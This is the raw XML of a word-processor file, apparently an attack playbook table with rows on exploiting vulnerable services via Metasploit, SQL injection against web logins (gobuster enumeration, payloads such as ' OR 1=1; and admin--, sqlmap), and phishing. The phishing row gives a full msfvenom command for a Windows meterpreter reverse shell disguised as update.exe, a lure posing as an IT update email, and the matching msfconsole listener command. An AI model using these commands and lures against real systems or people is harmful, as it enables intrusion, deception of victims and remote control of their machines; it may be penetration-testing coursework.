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6"/>
        <w:gridCol w:w="496"/>
        <w:gridCol w:w="2290"/>
        <w:gridCol w:w="2290"/>
        <w:gridCol w:w="1759"/>
        <w:gridCol w:w="1283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Vulnerable services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>
        <w:trPr>
          <w:trHeight w:val="1834" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="152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8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 server and find vulnerable services to later be exploited with metasploit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the MSFconsole and select the exploit for the vulnerable service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u</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>se exploit name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set targets – ip and port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The shell should automatically connect and you should have access. Priv Esc if needed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6"/>
        <w:gridCol w:w="496"/>
        <w:gridCol w:w="2290"/>
        <w:gridCol w:w="2290"/>
        <w:gridCol w:w="1759"/>
        <w:gridCol w:w="1283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SQLi, Web, Gobuster</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1834" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="152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8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Look through the webpage for a login page or a search bar.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can be done manually or gobuster can be used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gobuser dir -u $WEB -w </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>“/usr/share/seclists/Discovery/Web-Content/raft-small-words.txt”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login page for SQLi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the login for basic SQLi with the following payloads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‘ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>OR 1=1; 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admin--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 use SQLmap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plus more </w:t>
            </w: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https://book.hacktricks.xyz/pentesting-web/sql-injection</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr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PrivEsc once logged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Once successfully logged in as admin, determine how to perform privesc and go from there.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3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6"/>
        <w:gridCol w:w="496"/>
        <w:gridCol w:w="2290"/>
        <w:gridCol w:w="2290"/>
        <w:gridCol w:w="1759"/>
        <w:gridCol w:w="1283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3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Phishing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Msfvenom, metasploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1834" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="152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8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is attack is a phishing attack where the attacker persuades the user to download the reverse shell created by msfvenom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Create malicious file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bookmarkStart w:id="0" w:name="msfvenom-command"/>
            <w:bookmarkEnd w:id="0"/>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.10 LPORT=9001 -f exe -o update.exe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Send file to victim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Send file to victim with persuading text e.g. download update for software, email by IT team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Listen for shell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bookmarkStart w:id="1" w:name="listener-command"/>
            <w:bookmarkEnd w:id="1"/>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost 192.168.0.10; set lport 9001; exploit"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9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</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6339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Wait for shell to land, priv esc if needed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.hacktricks.xyz/pentesting-web/sql-injec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LibreOffice/7.3.7.2$Linux_X86_64 LibreOffice_project/30$Build-2</Application>
  <AppVersion>15.0000</AppVersion>
  <Pages>3</Pages>
  <Words>452</Words>
  <Characters>2446</Characters>
  <CharactersWithSpaces>2773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2023-10-30T10:07:29Z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